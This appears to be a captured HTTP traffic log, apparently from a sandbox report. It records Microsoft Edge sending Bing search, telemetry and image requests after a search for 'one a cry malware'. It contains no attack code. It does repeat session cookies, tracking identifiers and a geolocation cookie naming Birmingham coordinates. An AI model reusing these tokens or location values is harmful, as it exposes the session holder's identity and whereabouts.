x-cdn-traceid: 0.c2777b5c.1729199028.14911eb0
GET

https://www.bing.com/ipv6test/test?FORM=MONITR

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /ipv6test/test?FORM=MONITR HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199028.149120dc
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 19488
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 41572
date: Thu, 17 Oct 2024 21:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199028.149121d6
GET

https://www.bing.com/th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 54612
date: Thu, 17 Oct 2024 21:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199028.149121eb
GET

https://www.bing.com/th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199029.149127fd
POST

https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=125258D7D1334F6085405077EDD48B89&ID=SERP,6260.1&url=%2Fsearch%3Fq%3Done%2Ba%2Bcry%2Bmalware%26FORM%3DAWRE

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/GLinkPingPost.aspx?IG=125258D7D1334F6085405077EDD48B89&ID=SERP,6260.1&url=%2Fsearch%3Fq%3Done%2Ba%2Bcry%2Bmalware%26FORM%3DAWRE HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4

Response

HTTP/2.0 200

cache-control: private
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
access-control-allow-origin: *
x-eventid: 67117bb54e174e81930b227b648d9188
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-hcx/3yGPaovUh5ZziyOghqDeHApoHtmLj6ATSMSzYco='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: BE73C169674746BEBEEDC7632478DF2B Ref B: LON601060105054 Ref C: 2024-10-17T21:03:49Z
content-length: 0
date: Thu, 17 Oct 2024 21:03:49 GMT
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:03:49 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199029.149127fc
POST

https://www.bing.com/fd/ls/ls.gif?IG=125258D7D1334F6085405077EDD48B89&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1729199028598}&log=UserEvent

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/ls.gif?IG=125258D7D1334F6085405077EDD48B89&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1729199028598}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
cache-control: private, max-age=0
content-encoding: br
expires: Thu, 17 Oct 2024 21:02:49 GMT
vary: Accept-Encoding
x-eventid: 67117bb59e794115ad134ed831df8820
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-9l4HmqIDDRiD87hZoSJp7nhvKIpgSoaohY/UcgKNZvI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp&ndcParam=QWthbWFp"}]}
report-to: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
cross-origin-embedder-policy-report-only: 'require-corp; report-to=\"crossorigin-errors\"'
cross-origin-opener-policy-report-only: 'same-origin; report-to=\"crossorigin-errors\"'
date: Thu, 17 Oct 2024 21:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199029.1491282e
set-cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1; Domain=.bing.com; Path=/; Expires=Thu, 17 Oct 2024 23:03:49 GMT; Max-Age=7200; Secure
GET

https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /search?q=one+a+cry+malware&FORM=AWRE HTTP/2.0
host: www.bing.com
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
upgrade-insecure-requests: 1
dnt: 1
